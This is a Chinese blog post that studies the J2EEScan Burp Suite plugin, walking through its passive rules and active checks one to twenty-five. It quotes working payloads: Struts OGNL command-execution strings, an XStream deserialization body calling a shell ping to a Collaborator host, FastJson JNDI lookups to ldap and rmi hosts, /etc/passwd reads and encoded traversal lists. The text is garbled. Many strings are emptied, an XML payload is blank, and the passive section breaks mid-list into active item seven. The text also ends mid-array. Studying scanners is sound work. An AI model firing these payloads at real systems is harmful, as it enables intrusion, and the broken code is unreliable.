【BurpSuite】插件开发学习之J2EEScan - 汇总篇（主动+被动1-76）

【BurpSuite】插件开发学习之J2EEScan - 汇总篇（主动+被动1-76）

前言

为了方便查阅，将下列文章合并

【BurpSuite】插件开发学习之J2EEScan（上）-被动扫描
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(1-10)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(11-20)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(21-30)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(31-40)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(41-50)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(51-60)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(61-76)

J2EEScan

https://github.com/PortSwigger/j2ee-scan.git
逻辑代码在

|____src
| |____main
| | |____java
| | | |____burp
| | | | |____HTTPMatcher.java
| | | | |____J2EELFIRetriever.java
| | | | |____SoftwareVersions.java
| | | | |____WeakPasswordBruteforcer.java
| | | | |____j2ee
| | | | | |____PassiveScanner.java
| | | | | |____Confidence.java
| | | | | |____annotation
| | | | | | |____RunOnlyOnce.java
| | | | | | |____RunOnlyOnceForApplicationContext.java
| | | | | |____Risk.java
| | | | | |____passive
| | | | | | |____SessionFixation.java
| | | | | | |____ApacheStrutsS2023Rule.java
| | | | | | |____JettyRule.java
| | | | | | |____HttpServerHeaderRule.java
| | | | | | |____SqlQueryRule.java
| | | | | | |____PassiveRule.java
| | | | | | |____strutstoken
| | | | | | | |____StrutsTokenCracker.java
| | | | | | | |____ReplayRandom.java
| | | | | | |____ApacheTomcatRule.java
| | | | | | |____SessionIDInURL.java
| | | | | | |____JSPostMessage.java
| | | | | | |____ExceptionRule.java
| | | | | |____IssuesHandler.java
| | | | | |____lib
| | | | | | |____TesterAjpMessage.java
| | | | | | |____SimpleAjpClient.java
| | | | | |____issues
| | | | | | |____impl
| | | | | | | |____OracleEBSSSRF.java
| | | | | | | |____OracleEBSSSRFLCMServiceController.java
| | | | | | | |____ApacheStrutsS2032.java
| | | | | | | |____NodeJSRedirect.java
| | | | | | | |____ApacheRollerOGNLInjection.java
| | | | | | | |____ApacheStrutsDebugMode.java
| | | | | | | |____ApacheAxis.java
| | | | | | | |____HTTPWeakPassword.java
| | | | | | | |____HTTPProxy.java
| | | | | | | |____PrimeFacesELInjection.java
| | | | | | | |____WeblogicUDDIExplorer.java
| | | | | | | |____ApacheStrutsS2052.java
| | | | | | | |____JBossWebConsole.java
| | | | | | | |____EL3Injection.java
| | | | | | | |____XXEParameterModule.java
| | | | | | | |____UndertowTraversal.java
| | | | | | | |____LFIModule.java
| | | | | | | |____ApacheStrutsS2043.java
| | | | | | | |____FastJsonRCE.java
| | | | | | | |____OracleReportService.java
| | | | | | | |____SnoopResource.java
| | | | | | | |____JBossJMXReadOnly.java
| | | | | | | |____WebInfInformationDisclosure.java
| | | | | | | |____XInclude.java
| | | | | | | |____JavaServerFacesTraversal.java
| | | | | | | |____Seam2RCE.java
| | | | | | | |____WeblogicConsole.java
| | | | | | | |____RESTAPISwagger.java
| | | | | | | |____JettyRemoteLeakage.java
| | | | | | | |____JBossJMXInvoker.java
| | | | | | | |____OASConfigFilesDisclosure.java
| | | | | | | |____JacksonDataBindCVE20177525.java
| | | | | | | |____XXEModule.java
| | | | | | | |____WeblogicCVE20192725.java
| | | | | | | |____WeblogicWebServiceTestPageCVE20182894.java
| | | | | | | |____JKStatus.java
| | | | | | | |____WeblogicCVE201710271.java
| | | | | | | |____LFIAbsoluteModule.java
| | | | | | | |____ApacheStrutsS2016.java
| | | | | | | |____ApacheStrutsShowcase.java
| | | | | | | |____ApacheStrutsWebConsole.java
| | | | | | | |____ApacheStrutsS2020.java
| | | | | | | |____StatusServlet.java
| | | | | | | |____UTF8ResponseSplitting.java
| | | | | | | |____TomcatHostManager.java
| | | | | | | |____SpringBootRestRCE.java
| | | | | | | |____PivotalSpringTraversalCVE20143625.java
| | | | | | | |____Htaccess.java
| | | | | | | |____JBossjBPMAdminConsole.java
| | | | | | | |____ELInjection.java
| | | | | | | |____NodeJSPathTraversal.java
| | | | | | | |____ApacheStrutsS2017.java
| | | | | | | |____ApacheSolrXXE.java
| | | | | | | |____OASSqlnetLogDisclosure.java
| | | | | | | |____NodeJSResponseSplitting.java
| | | | | | | |____URINormalizationTomcat.java
| | | | | | | |____JBossWS.java
| | | | | | | |____SpringCloudConfigPathTraversal.java
| | | | | | | |____InfrastructurePathTraversal.java
| | | | | | | |____AJPDetector.java
| | | | | | | |____JBossAdminConsole.java
| | | | | | | |____SSRFScanner.java
| | | | | | | |____SpringDataCommonRCE.java
| | | | | | | |____JavascriptSSRF.java
| | | | | | | |____ApacheWicketArbitraryResourceAccess.java
| | | | | | | |____SpringBootActuator.java
| | | | | | | |____IDocInjection.java
| | | | | | | |____TomcatManager.java
| | | | | | | |____NextFrameworkPathTraversal.java
| | | | | | | |____OracleCGIPrintEnv.java
| | | | | | | |____JBossJuddi.java
| | | | | | | |____AJP_Tomcat_GhostCat.java
| | | | | | | |____SpringWebFlowDataBindExpressionCVE20174971.java
| | | | | | |____IModule.java
| | | | | |____CustomScanIssue.java
| | | | |____J2EELocalAssessment.java
| | | | |____WeakPassword.java
| | | | |____HTTPParser.java
| | | | |____CustomHttpRequestResponse.java
| | | | |____BurpExtender.java

这个代码是基于java写的

BurpExtender

老样子，继承BurpExtender

class BurpExtender(IBurpExtender):

基本信息也和java差不多

public void registerExtenderCallbacks(final IBurpExtenderCallbacks callbacks) {
        // keep a reference to our callbacks object
        this.callbacks = callbacks;
        this.callbacks.registerExtensionStateListener(this);
        // obtain an extension helpers object
        helpers = callbacks.getHelpers();
        // obtain our output stream
        stdout = new PrintWriter(callbacks.getStdout(), true);
        stderr = new PrintWriter(callbacks.getStderr(), true);

        // set our extension name
        callbacks.setExtensionName("J2EE Advanced Tests");

然后创建了一个临时数据库文件并连接了

j2eeDBState = File.createTempFile("burpsuite-j2eescan-state", ".db");
            stdout.println("Using temporary db state file: " + j2eeDBState.getAbsolutePath());
            stdout.println("This internal state is used to avoid duplicate infrastructure security "
                    + "checks on the same host, improving the scan performance");

            connectToDatabase(j2eeDBState.getAbsolutePath());

初始化的数据库表executed_plugins

String fields = "plugin, host, port";

        conn.createStatement().executeUpdate("CREATE TABLE IF NOT EXISTS executed_plugins ("
                + " plugin TEXT PRIMARY KEY,"
                + " host TEXT,"
                + " port INTEGER,"
                + " UNIQUE(" + fields + "))");

doPassiveScan

重写了被动扫描，在PassiveScanner这个类里。

PassiveScanner.scanVulnerabilities(baseRequestResponse, callbacks);

遍历如下规则进行扫描

static PassiveRule[] PASSIVE_RULES = {
            new ApacheTomcatRule(),
            new ExceptionRule(),
            new HttpServerHeaderRule(),
            new SqlQueryRule(),
            new ApacheStrutsS2023Rule(),
            new JettyRule(),
            new SessionIDInURL(),
            new JSPostMessage(),
            new SessionFixation()
    };

一个一个看，

ApacheTomcatRule

【1】tomcat版本发现

Risk.Low

Pattern.compile("Apache Tomcat/([\\d\\.]+)"

【2】tomcat远程jvm虚拟机

Risk.Information

Pattern.compile("\">(1\\.\\d\\.[\\w\\-\\_\\.]+)<"

ExceptionRule

【3】Apache Struts 测试页面

判断struts是开发环境还是dev环境
Risk.Low

"".getBytes();

【4】Apache Tapestry 异常错误展示

Risk.Low

            byte[] tapestryException = "
An unexpected application exception has occurred.
".getBytes();

【5】Grails 异常错误展示

Risk.Low

            byte[] grailsException = "
Grails Runtime Exception
".getBytes();

【6】GWT 异常错误展示

Risk.Low

            byte[] gwtException = "com.google.gwt.http.client.RequestException".getBytes();

【7】java 常见的应用异常错误展示

Risk.Low

List<byte[]> javaxServletExceptions = Arrays.asList(
                    "javax.servlet.ServletException".getBytes(),
                    "οnclick=\"toggle('full exception chain stacktrace".getBytes(),
                    "at org.apache.catalina".getBytes(),
                    "at org.apache.coyote.".getBytes(),
                    "at org.jboss.seam.".getBytes(),
                    "at org.apache.tomcat.".getBytes(),
                    "".getBytes(),  // WAS
                    "The full stack trace of the root cause is available in".getBytes());
                    "
com.sun.facelets.FaceletException".getBytes(),
                    "Generated by MyFaces - for information on disabling".getBytes(),
                    "
            "/tresearch/", // JBuilder Apache Axis Admin Console
            "/"
    );
 
  
这些根目录加上admin目录请求
 
  
private static final String AXIS_ADMIN_PATH = "/axis2-admin/";
 
  
如果match到
 
  
    private static final byte[] GREP_STRING_AXIS_ADMIN = "".getBytes(),
            "".getBytes()
    );
 
  
则认为获取到了Service列表
 
  
【7】ApacheRollerOGNLInjection(表达式注入)-CVE-2013-4212
 
  
表达式注入
 
  
String EL_INJECTION_TEST = String.format("${%d*%d}", firstInt, secondInt);
 
  
攻击入口是登录页 url存在
 
  
if (curURL.getPath().contains("login.rol"))
 
  
去除所有参数
 
  
for (IParameter param : parameters) {
                rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param);
            }
 
  
新增攻击参数
 
  
rawrequest = callbacks.getHelpers().addParameter(rawrequest,
                    callbacks.getHelpers().buildParameter("pageTitle", EL_INJECTION_TEST, IParameter.PARAM_URL)
            );
 
  
如果从返回包中Match到上面的计算结果，则认为表达式注入成功。
 
  
【8】ApacheSolrXXE - CVE-2017-12629
 
  
payload
 
  
String xxesolr = "{!xmlparser v=''}";
 
  
%s用burp自带的dnslog接口
 
  
        IBurpCollaboratorClientContext collaboratorContext = callbacks.createBurpCollaboratorClientContext();
        String currentCollaboratorPayload = collaboratorContext.generatePayload(true);

 
  
发送请求
 
  
byte[] checkRequest = insertionPoint.buildRequest(xxePayload.getBytes());
IHttpRequestResponse checkRequestResponse = callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), checkRequest);
 
  
match就看dns结果啦
 
  
【9】ApacheStrutsDebugMode（debug页面泄露）
 
  
先判断URL是不是java
 很粗，前面文章已经讲过了。
 
  
List notJ2EETechs = new ArrayList<>();
        notJ2EETechs.add("php");
        notJ2EETechs.add("asp");
        notJ2EETechs.add("cgi");
        notJ2EETechs.add("pl");

        return (!notJ2EETechs.contains(curExtension));
 
  
老样子
 去除所有入参
 
  
//Remove URI parameters
        for (IParameter param : parameters) {
            rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param);
        }
 
  
新增参数，debug=console
 
  
rawrequest = callbacks.getHelpers().addParameter(rawrequest,
                callbacks.getHelpers().buildParameter("debug", "console", IParameter.PARAM_URL)
        );
 
  
如果返回包match
 
  
private static final byte[] GREP_STRING = "'OGNL Console'".getBytes();
 
  
则存在漏洞，表达式注入。
 看着像后门
 http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
 
 
  
【10】ApacheStrutsS2016(表达式注入)-(S2-016)
 
  
这里准备了两个payload
 
  
payloads.add("${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27id%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}");
        payloads.add("${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20ipconfig.exe%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}");

 
  
一个是适配linux一个是windows
 简单看看payload语法
 
  
${
    #a=(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd.exe','/c ipconfig.exe'})).start(),
    #b=#a.getInputStream(),
    #c=new java.io.InputStreamReader(#b),
    #d=new java.io.BufferedReader(#c),
    #e=new char[50000],
    #d.read(#e),
    #matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
    #matt.getWriter().println(#e),
    #matt.getWriter().flush(),
    #matt.getWriter().close()
    }	
 
  
对比看下正常java 调用java.lang.ProcessBuilder执行命令的实例
 
  
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
 
 
public class ProcessTest {
	public static void main(String args[]) {
		
		ProcessBuilder pb = new ProcessBuilder();
		pb.command(new String[] { cmd });
		try {
			Process process = pb.start();
			InputStream stdout = process.getInputStream();
			InputStreamReader isr = new InputStreamReader(stdout);
			BufferedReader br = new BufferedReader(isr);
			String line = null;
			while ( (line = br.readLine()) != null)
			System.out.println(line);
			int exitVal = process.waitFor();
			System.out.println(exitVal);
		} catch (IOException e) {
			e.printStackTrace();
		} catch (InterruptedException e) {
			e.printStackTrace();
		}
	}
}


 
  
实际也就是增加了一个httprsp的回显，比较清晰
 上面的payload循环放到参数，如下参数都有可能存在漏洞
 
  
List<String> redirectMeth = new ArrayList();
        redirectMeth.add("action:");
        redirectMeth.add("redirect:");
        redirectMeth.add("redirectAction:");
 
  
因为我们的payload希望是长成这样
 
  
redirect:xxxxx
 
  
所以要做一个替换，这里是因为前面只需要remove所有其他参数，剩下的第一个等于号应该是我们加入的这个参数和payload中间。
 
  
String utf8rawRequest = new String(rawrequest, "UTF-8");
modifiedRawRequest = utf8rawRequest.replaceFirst("=", "").getBytes();
 
  
如果match到
 
  
 static {
        DETECTION_REGEX.add(Pattern.compile("Subnet Mask", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
        DETECTION_REGEX.add(Pattern.compile("uid=[0-9]+.*gid=[0-9]+.*", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE));
        DETECTION_REGEX.add(Pattern.compile("java\\.lang\\.(UNIX)", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
    }

 
  
subnet mask是网关的意思，匹配的是win
 第三个没太理解，有可能是Win执行了linux的表达式抛出来的异常？
 
  
【11】ApacheStrutsS2017-S2-017
 
  
参数较016 少了redirect:
 
  
       redirectMeth.add("redirect:");
        redirectMeth.add("redirectAction:");
 
  
payload
 
  
       rawrequest = callbacks.getHelpers().addParameter(rawrequest,
                        callbacks.getHelpers().buildParameter(redir, "http://www.example.com/%23", IParameter.PARAM_URL)
                );

 
  
这里竟然没有恶意参数，知识一个跳转
 match返回的状态码和header头
 
  
  if (statusCode >= 300 && statusCode < 400) {
                          if (header.substring(header.indexOf(":") + 1).trim().startsWith("http://www.example.com/")) {

 
  
看起来s2 017就是个URL跳转
 https://www.cnblogs.com/jinqi520/p/10813737.html
 
 
  
【12】ApacheStrutsS2020 - S2-020
 
  
参数
 
  
modifiedRawRequest = callbacks.getHelpers().addParameter(rawrequest,
                callbacks.getHelpers().buildParameter("Class.classLoader.URLs[0]",
                        classLoaderStringTest, IParameter.PARAM_URL)
        );
 
  
payload
 
  
long unixTime = System.currentTimeMillis() / 1000L;
        String classLoaderStringTest = "testClassloaderManipulation" + unixTime;
 
  
match返回包
 
  
    private static final Pattern CLASSLOADER_PM = Pattern.compile("Invalid field value for field|No result defined for action",

 
  
这个漏洞原理是支持使用classLoader
 可以看这篇
 struts自定义的classloadr
 
  
class.classLoader.resources.dirContext.docBase
 
  

 这里有两种绕过姿势
 
  
 
   
class[‘classLoader’]
 
   
Class.classloader
 问题正则
 
  
 
  
(.*\.|^)class\..*  两种都能绕过
(.*\.|^)(class|Class)(\.|\[).* 中括号可以绕过
 
  
安全正则
 
  
(.*\.|^|.*|\[('|"))(c|C)lass(\.|('|")]|\[).*
 
  
【13】ApacheStrutsS2032 - S2-032
 
  
老样子，去除所有参数
 
  
     byte[] rawrequest = baseRequestResponse.getRequest();
        //Remove URI parameters
        for (IParameter param : parameters) {
            rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param);
        }
 
  
入参
 
  
method:
 
  
payload
 
  
%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.hook[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString
 
  
展开看看
 
  
#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,
#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),
#kzxs.print(#parameters.hook[0]),
#kzxs.print(new java.lang.Integer(829+9)),
#kzxs.close(),1?
#xx:
#request.toString
 
  
第一步：从表达式上解释设置context中_memberAccess值为ognl.OgnlContext的属性DEFAULT_MEMBER_ACCESS的值.（SecurityMemberAccess 比较严格限制了反射类，DefaultMemberAccess不限制反射类），后面直接调用反射就行。
 其中hook[0]是后面的参数
 
  
modifiedRawRequest = callbacks.getHelpers().addParameter(modifiedRawRequest,
                    callbacks.getHelpers().buildParameter("hook", "HOOK_VAL", IParameter.PARAM_URL)
            );
 
  
match，因为print了俩，一个是HOOK_VAL，一个是表达式计算的值。
 
  
private static final Pattern DYNAMIC_METHOD_INVOCATION = Pattern.compile("HOOK_VAL838",
            Pattern.DOTALL | Pattern.MULTILINE);
 
  
【14】ApacheStrutsS2043 - S2-043（Config Browser插件泄露）
 
  
遍历path
 
  
private static final List<String> BROWSER_PATHS = Arrays.asList(
            "/config-browser/actionNames",
            "/config-browser/actionNames.action"
    );
 
  
请求之后match
 
  
private static final byte[] GREP_STRING = "".getBytes();
 
  
 
  
【15】ApacheStrutsS2052-S2-052
 
  
首先判断了有没有content-type
 
  
        String contentTypeHeader = HTTPParser.getRequestHeaderValue(reqInfo, "Content-type");

 
  
毕竟payload要靠xml传过去
 增加content-type
 
  
        List<String> headersWithContentTypeXML = HTTPParser.addOrUpdateHeader(headers, "Content-type", "application/xml");

 
  
payload
 
  
String payload = " ping " + currentCollaboratorPayload;

        String xmlMarshallingBody= " +
            "  \n" +
            "    \n" +
            "      0\n" +
            "      \n" +
            "        \n" +
            "          \n" +
            "            \n" +
            "              \n" +
            "                false\n" +
            "                0\n" +
            "                \n" +
            "                  \n" +
            "                    \n" +
            "                    \n" +
            "                      \n" +
            "                        /bin/sh-c " + payload + "\n" +
            "                      \n" +
            "                      false\n" +
            "                    \n" +
            "                  \n" +
            "                  \n" +
            "                    \n" +
            "                      java.lang.ProcessBuilder\n" +
            "                      start\n" +
            "                      \n" +
            "                    \n" +
            "                    foo\n" +
            "                  \n" +
            "                  foo\n" +
            "                \n" +
            "                \n" +
            "              \n" +
            "              \n" +
            "              \n" +
            "              false\n" +
            "              0\n" +
            "              0\n" +
            "              false\n" +
            "            \n" +
            "            false\n" +
            "          \n" +
            "          \n" +
            "        \n" +
            "        0\n" +
            "      \n" +
            "    \n" +
            "    \n" +
            "  \n" +
            "  \n" +
            "    \n" +
            "    \n" +
            "  \n" +
            "";
        
    
        
 
  
这个payload和之前的有所不同，查一下漏洞原理：
 使用Struts2 REST插件的XStream组件反序列化操作没有校验。
 https://blog.csdn.net/qq_44312507/article/details/103585253
 match的话match
 collaboratorContext的接收值就行。
 
  
【16】ApacheStrutsShowcase
 
  
ApacheStrutsShowcase
 关键路劲
 
  
   private static final List<String> STRUTS_SHOWCASE_PATHS = Arrays.asList(
            "/struts2-showcase/showcase.action"
    );
 
  
如果match到
 
  
private static final byte[] GREP_STRING = "".getBytes();
 
  
则存在问题
 
  
看上去这个showcase.action在多个S2系列的漏洞中出现，比较容易出问题。
 https://www.anquanke.com/post/id/86757
 
  
【16】ApacheStrutsWebConsole
 
  
控制台路径
 
  
private static final List<String> STRUTS_WEBCONSOLE_PATHS = Arrays.asList(
            "/struts/webconsole.html?debug=console"
    );
 
  
如果match到
 
  
private static final byte[] GREP_STRING = "title>OGNL Console".getBytes();
 
  
则存在问题
 长这样
 
 但是有利用条件
 只有在开启了Debug模式且ClassPath中使用了struts2-dojo-plugin-*.jar的情况下，webconsole.html页面才有可能存在安全漏洞的风险。
 https://www.secpulse.com/archives/48383.html
 
  
【17】ApacheWicketArbitraryResourceAccess 目录穿越漏洞
 
  
路径包含
 
  
"wicket/resource")
 
  
payload则是替换掉上面的路径
 换成
 
  
    private static final List<String> PAYLOADS = Arrays.asList(
            "wicket/resource/int/wicket.properties,/bla/ HTTP",
            "wicket/resources/int/wicket.properties,/bla/ HTTP"
    );

 
  
这里采用的是替换原始请求包正则匹配
 
  
                byte[] wicketRequest = helpers.stringToBytes(plainRequest.replaceFirst("wicket\\/resource.*? HTTP", payload));

 
  
match则是
 
  
    private static final byte[] GREP_STRING = "initializer=".getBytes();

 
  
百度竟然没有找到相关漏洞解释
 去apache看看
 https://issues.apache.org/jira/browse/WICKET-4427
 看出来了，是目录穿越
 
  
public ExtensionResourceNameIterator(String path, final String extension)
    {
        if ((extension == null) && (path.indexOf('.') != -1))
        {
// Get the extension from the path provided
            extensions = new String[] { "." + Strings.lastPathComponent(path, '.') };
            path = Strings.beforeLastPathComponent(path, '.');
        }
        else if (extension != null)
        {
// Extension can be a comma separated list
            extensions = Strings.split(extension, ',');
            for (int i = extensions.length - 1; i >= 0; i--)
            {
                extensions[i] = extensions[i].trim();
                if (!extensions[i].startsWith("."))
                {
                    extensions[i] = "." + extensions[i];
                }
            }
        }
        else
        {
            extensions = new String[1];
            extensions[0] = ".";
        }

        this.path = path;
        index = 0;
    }
 
  
注意这个分支
 
  
else if (extension != null)
        {
// Extension can be a comma separated list
            extensions = Strings.split(extension, ',');
            for (int i = extensions.length - 1; i >= 0; i--)
            {
                extensions[i] = extensions[i].trim();
                if (!extensions[i].startsWith("."))
                {
                    extensions[i] = "." + extensions[i];
                }
            }
        }
 
  
相当于根据,取了多个后缀然后拼接造成了路径穿越。
 
  
【18】EL3Injection EL 3.0/Lambda Injection EL表达式注入
 
  
payload
 
  
   private static final List<byte[]> EL_INJECTION_TESTS = Arrays.asList(
            "System.getProperties()".getBytes()
    );            
     
 
  
直接post请求发过去
 
  
            byte[] checkRequest = insertionPoint.buildRequest(INJ_TEST);
            IHttpRequestResponse checkRequestResponse = callbacks.makeHttpRequest(
                    baseRequestResponse.getHttpService(), checkRequest);
 
  
match到
 
  
    private static final byte[] GREP_STRING = "java.vendor".getBytes();  
    
 
  
则存在漏洞
 这是直接执行命令？？
 match的是命令结果
 
 看了下文章
 
 不太现实，是指用户的输入直接传入了elp.eval执行
 
  
【19】ELInjection EL (Expression Language) Injection
 
  
payload
 
  
        byte[] EL_TEST = "(new+java.util.Scanner((T(java.lang.Runtime).getRuntime().exec(\"cat+/etc/passwd\").getInputStream()),\"UTF-8\")).useDelimiter(\"\\\\A\").next()".getBytes();

 
  
拆分一下
 
  
a = T(java.lang.Runtime).getRuntime().exec(\"cat+/etc/passwd\")
b = a.getInputStream()
c = new java.util.Scanner(b,utf)
d = c.useDelimiter(\"\\\\A\")
e = d.next()
 
  
match的话就matchpasswd，这个判断不好，既然都是exec，为何不用ping这种跨平台的命令或者echo。
 
  
第二中payload
 
  
     HashMap<byte[], byte[]> EL_INJECTIONS = new HashMap<byte[], byte[]>() {
            {
                put("${applicationScope}".getBytes(), "javax.servlet.context".getBytes());
                put("#{applicationScope}".getBytes(), "javax.servlet.context".getBytes());
                put(String.format("${%d*%d}", firstInt, secondInt).getBytes(), multiplication.getBytes());
                put(String.format("#{%d*%d}", firstInt, secondInt).getBytes(), multiplication.getBytes());
                put(String.format("{{%d*%d}}", firstInt, secondInt).getBytes(), multiplication.getBytes());
            }
        };

 
  
key是payload，value是响应包的match
 EL表达式
 https://xz.aliyun.com/t/7692
 
  
【20】FastJsonRCE CVE 2017-18349
 
  
payload
 
  
    // https://github.com/jas502n/fastjson-1.2.61-RCE
        List<String> PAYLOADS = new ArrayList<>();
        PAYLOADS.add("{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://%s:80/obj\",\"autoCommit\":true}");
        PAYLOADS.add("{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"ldap://%s:80/ExportObject\"}");
        PAYLOADS.add("{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://%s:80/ExportObject\",\"autoCommit\":true}}");
        PAYLOADS.add("{\"a\":{ \"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://%s:80/ExportObject\",\"autoCommit\":true}}");

 
  
记得改content-type
 
  
 String contentTypeHeader = HTTPParser.getRequestHeaderValue(reqInfo, "Content-type");
        if (contentTypeHeader != null && !contentTypeHeader.contains("json")) {
 
  
match dnslog即可
 
  
collaboratorContext
 
  
分析看这个吧
 http://xxlegend.com/2018/10/23/基于JdbcRowSetImpl的Fastjson%20RCE%20PoC构造与分析/
 
  
【21】Htaccess - .htaccess泄露
 
  
这个也要做一个插件impl？
 请求"/.htaccess"; match private static final byte[] GREP_STRING = "RewriteEngin".getBytes();
 
  
【22】HTTPProxy
 
  
看着是比较老的洞了
 
 说是connect 协议走http协议，代理到其他网站就可以绕过https的限制
 发送
 
  
            byte[] rawrequestHTTPConnect = "CONNECT http://www.google.com/humans.txt HTTP/1.0\r\n\r\n".getBytes();

 
  
match
 
  
private static final byte[] GREP_STRING = "Google is built by a large".getBytes();
 
  
这国内没法检测，建议重写个http的链接。
 
  
【23】HTTPWeakPassword 弱口令
 
  
先判断返回包
 
  
        String wwwAuthHeader = getResponseHeaderValue(respInfo, "WWW-Authenticate");

 
  
是不是401
 
  
        if (responseCode == 401 && wwwAuthHeader != null) {

 
  
这个走的是之前提到的TOMCAT弱口令那个类
 
  
HTTPBasicBruteforce
credentials = wp.getCredentials();
 
  
 
  
【24】IDocInjection - CVE-2013-3770任意文件读取
 
  
Oracle IDoc 13年爆出的漏洞
 payload
 
  
   private static final List<byte[]> EL_INJECTION_TESTS = Arrays.asList(
            "<$fileName=\"../../../../../../../../../../../etc/passwd\"$><$executeService(\"GET_LOGGED_SERVER_OUTPUT\")$><$ServerOutput$>".getBytes());

 
  
match
 
  
            Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));

 
  
【25】InfrastructurePathTraversal 目录穿越绕waf
 
  
这个就是通用型的一个绕waf
 payload1
 
  
 private static final List<String> UTF8_LFI_PATHS = Arrays.asList(
            "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f",
            "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/",
            "/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f",
            "/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f",
            "/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f",
            "/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/",
            "/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f",
            "/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c",
            "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c",
            "/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\",
            "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af",
            "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/",
